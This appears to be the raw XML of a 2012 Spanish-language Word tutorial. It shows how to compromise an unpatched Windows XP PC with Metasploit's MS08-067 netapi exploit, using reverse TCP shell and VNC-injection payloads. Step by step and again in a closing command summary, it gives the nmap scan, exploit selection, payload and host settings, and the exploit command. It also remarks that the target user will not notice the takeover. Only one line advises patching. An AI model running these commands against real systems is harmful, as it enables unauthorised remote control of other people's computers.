      <w:r w:rsidRPr="00A96C90">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t>. El usuario de la PC objetivo no notara que estamos controlando su PC.</w:t>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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:br/>
        <w:t>Cargamos escribiendo lo siguiente:</w:t>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i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t>set PAYLOAD windows/shell/reverse_tcp</w:t>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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">7- Seteamos con nuestra </w:t>
      </w:r>
      <w:r w:rsidRPr="00A96C90">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t>IP local</w:t>
      </w:r>
      <w:r w:rsidRPr="00A96C90">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t>:</w:t>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i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t>set LHOST [IP Local]</w:t>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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:br/>
        <w:t>Ejemplo: set LHOST 10.0.0.3</w:t>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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00D12460">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3810000" cy="2667000"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="27" name="Imagen 27" descr="C:\Documents and Settings\Administrador\Mis documentos\Descargas\neta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Administrador\Mis documentos\Descargas\netapi.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3810000" cy="2667000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:br/>
        <w:t>8- Enviamos el exploit:</w:t>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i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t>exploit</w:t>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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00D12460">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3810000" cy="2657475"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="29" name="Imagen 29" descr="C:\Documents and Settings\Administrador\Mis documentos\Descargas\explo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Administrador\Mis documentos\Descargas\exploit.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3810000" cy="2657475"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Y listo! </w:t>
      </w:r>
      <w:r w:rsidRPr="00A96C90">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t>Acceso concedido</w:t>
      </w:r>
      <w:r w:rsidRPr="00A96C90">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t>, ya tenemos una shell remota de la PC con windows XP! Con esta shell tenemos acceso total.</w:t>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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Ahora como otra alternativa usaremos el </w:t>
      </w:r>
      <w:r w:rsidRPr="00A96C90">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t>Payload de VNC</w:t>
      </w:r>
      <w:r w:rsidRPr="00A96C90">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t xml:space="preserve"> "windows/vncinject/reverse_tcp", este Payload </w:t>
      </w:r>
      <w:r w:rsidRPr="00A96C90">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t>permite ver el escritorio remoto</w:t>
      </w:r>
      <w:r w:rsidRPr="00A96C90">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t>. No es nada discreto.</w:t>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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:br/>
        <w:t>Ahora podemos seguir a partir del punto 5, o seguir desde el punto 8. Es lo mismo.</w:t>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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:br/>
        <w:t>9- Presionamos (Ctrl+C) para cerrar la conexion de la shell.</w:t>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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:br/>
        <w:t>10- Cargamos el Payload escribiendo:</w:t>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i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t>set PAYLOAD windows/vncinject/reverse_tcp</w:t>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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:br/>
        <w:t>11- Seteamos con nuestra IP local:</w:t>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i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t>set LHOST [IP local]</w:t>
      </w:r>
      <w:r w:rsidRPr="00A96C90">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:br/>
        <w:t>Ejemplo: set LHOST 10.0.0.3</w:t>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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:br/>
        <w:t>12- Enviamos el exploit escribiendo:</w:t>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i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t>exploit</w:t>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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00D12460">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3810000" cy="2667000"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="31" name="Imagen 31" descr="C:\Documents and Settings\Administrador\Mis documentos\Descargas\netap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Administrador\Mis documentos\Descargas\netapi2.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3810000" cy="2667000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00D12460">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3810000" cy="2219325"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="33" name="Imagen 33" descr="C:\Documents and Settings\Administrador\Mis documentos\Descargas\v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Administrador\Mis documentos\Descargas\vnc.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3810000" cy="2219325"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:br/>
        <w:t>Y listo ya tenemos acceso remoto a la PC con windows XP mediante VNC!</w:t>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b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t>Resumen de los comandos utilizados:</w:t>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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:br/>
        <w:t>Tomando como ejemplo las siguientes IPs:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A96C90">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:br/>
        <w:t>IP de nuestra pc (BackTrack): 10.0.0.3</w:t>
      </w:r>
      <w:r w:rsidRPr="00A96C90">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:br/>
        <w:t>IP de la PC objetivo (Windows XP): 10.0.0.4</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D12460" w:rsidRDefault="00D12460" w:rsidP="00D12460">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A96C90" w:rsidRPr="00A96C90" w:rsidRDefault="00A96C90" w:rsidP="00D12460">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A96C90">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:r w:rsidRPr="00A96C90">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:br/>
        <w:t>ifconfig</w:t>
      </w:r>
      <w:r w:rsidRPr="00A96C90">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:br/>
        <w:t>nmap -sS -O 10.0.0.1-255</w:t>
      </w:r>
      <w:r w:rsidRPr="00A96C90">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:br/>
        <w:t>use exploit/windows/smb/ms08_067_netapi</w:t>
      </w:r>
      <w:r w:rsidRPr="00A96C90">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:br/>
        <w:t>set RHOST 10.0.0.4</w:t>
      </w:r>
      <w:r w:rsidRPr="00A96C90">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:br/>
        <w:t>set PAYLOAD windows/shell/reverse_tcp</w:t>
      </w:r>
      <w:r w:rsidRPr="00A96C90">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:br/>
        <w:t>set LHOST 10.0.0.3</w:t>
      </w:r>
      <w:r w:rsidRPr="00A96C90">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:br/>
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E72AC3" w:rsidRDefault="00A96C90" w:rsidP="00A96C90">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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:br/>
        <w:t>Como pueden ver son muy pocos los comandos utilizados, por lo que a una persona con conocimientos basicos de Metasploit se le hace muy facil acceder a una PC con windows XP sin los parches de seguridad.</w:t>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b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t>Se recomienda actualizar windows XP para evitar este tipo de ataques.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A96C90">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00A96C90">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:br/>
        <w:t>Links de interes:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A96C90">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:hyperlink r:id="rId17" w:history="1">
        <w:r w:rsidRPr="00A96C90">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:eastAsia="es-ES_tradnl"/>
          </w:rPr>
          <w:t>Video de youtube: Exploiting windows xp with BackTrack 5 using metasploit</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00A96C90">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:hyperlink r:id="rId18" w:history="1">
        <w:r w:rsidRPr="00A96C90">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:eastAsia="es-ES_tradnl"/>
          </w:rPr>
          <w:t>Curso de Metasploit Unleashed en Español</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:sectPr w:rsidR="00E72AC3" w:rsidSect="00E72AC3">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altName w:val="Times New Roman"/>
    <w:panose1 w:val="00000000000000000000"/>
    <w:charset w:val="00"/>
    <w:family w:val="roman"/>
    <w:notTrueType/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="00000000" w:usb1="00000000" w:usb2="00000000" w:usb3="00000000" w:csb0="00000000"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altName w:val="Times New Roman"/>
    <w:panose1 w:val="00000000000000000000"/>
    <w:charset w:val="00"/>
    <w:family w:val="roman"/>
    <w:notTrueType/>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A96C90"/>
    <w:rsid w:val="00A96C90"/>
    <w:rsid w:val="00D12460"/>
    <w:rsid w:val="00E72AC3"/>
  </w:rsids>
  <m:mathPr>
    <m:mathFont m:val="Cambria Math"/>
    <m:brkBin m:val="before"/>
    <m:brkBinSub m:val="--"/>
    <m:smallFrac m:val="off"/>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2AC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96C90"/>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styleId="Hipervnculo">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A96C90"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Textodeglobo">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="TextodegloboCar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D1246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246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32939059">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1954628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ogle.com.ar/search?q=iniciar+backtrack+5+desde+un+cd&amp;ie=utf-8&amp;oe=utf-8&amp;aq=t&amp;rls=org.mozilla:es-AR:official&amp;client=firefox-a" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.metasploit-es.com.ar/wiki/index.php/Curso_de_Metasploit_Unleashed_en_Espa%C3%B1ol" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.backtrack-linux.org/downloads/" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.youtube.com/watch?v=Zz39iHrFGDY&amp;feature=related" TargetMode="Externa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securityfocus.com/bid/19409/info" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.backtrack-linux.org/" TargetMode="Externa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hyperlink" Target="http://www.metasploit.com/" TargetMode="Externa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6</Pages>
  <Words>797</Words>
  <Characters>4389</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>36</Lines>
  <Paragraphs>10</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company>Evo Team</Company>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>5176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Nyr</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Nyr</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2012-04-29T11:31:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2012-04-29T11:41:00Z</dcterms:modified>
</cp:coreProperties>
</file>